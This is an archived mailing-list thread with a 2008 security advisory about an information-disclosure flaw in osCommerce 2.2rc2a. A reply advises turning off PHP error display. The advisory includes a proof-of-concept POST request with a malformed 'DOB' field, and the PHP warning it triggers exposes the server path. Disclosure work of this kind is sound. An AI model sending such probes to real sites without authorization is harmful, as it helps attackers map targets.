subject:"\[NOBYTES.COM\: #12\] osCommerce 2.2rc2a \- Information Disclosure"

Re: [NOBYTES.COM: #12] osCommerce 2.2rc2a - Information Disclosure

2009-04-14 Thread Anonymous

php config on production servers should have the following directives set to

display_errors = off
log_errors = on
error_log = /your/full/path/html/error.log

[NOBYTES.COM: #12] osCommerce 2.2rc2a - Information Disclosure

2008-09-16 Thread John Cobb

Application:osCommerce 2.2rc2a
Authors Site:   http://www.oscommerce.com/

+--+

Information Disclosure:

Manipulation of the 'DOB' Variable on create_account.php can cause
information disclosure:


In this example the POST variable 'DOB' has been set to: FOOBAR

POST /oscommerce/create_account.php

action=processgender=mfirstname=johnlastname=smithdob=FOOBARemail_addre
[EMAIL PROTECTED]company=foobarstreet_address=foobarsuburb=foobarpost
code=foobarcity=foobarstate=foobarcountry=1telephone1=123456789fax=1234
56789newsletter=onpassword=foobarconfirmation=foobar

Result:

Warning: checkdate() expects parameter 3 to be long, string given in
/var/www/oscommerce/create_account.php on line 80


+-[Notes:]-+

Vulnerabilities found on: 05/09/2008
Author(s) Informed on: 06/09/2008
Author(s) Response: None Yet
Author(s) Fix: None Yet


[EMAIL PROTECTED]

http://www.NoBytes.com

Re: [NOBYTES.COM: #12] osCommerce 2.2rc2a - Information Disclosure

[NOBYTES.COM: #12] osCommerce 2.2rc2a - Information Disclosure

2 matches

Site Navigation

Mail list logo

Footer information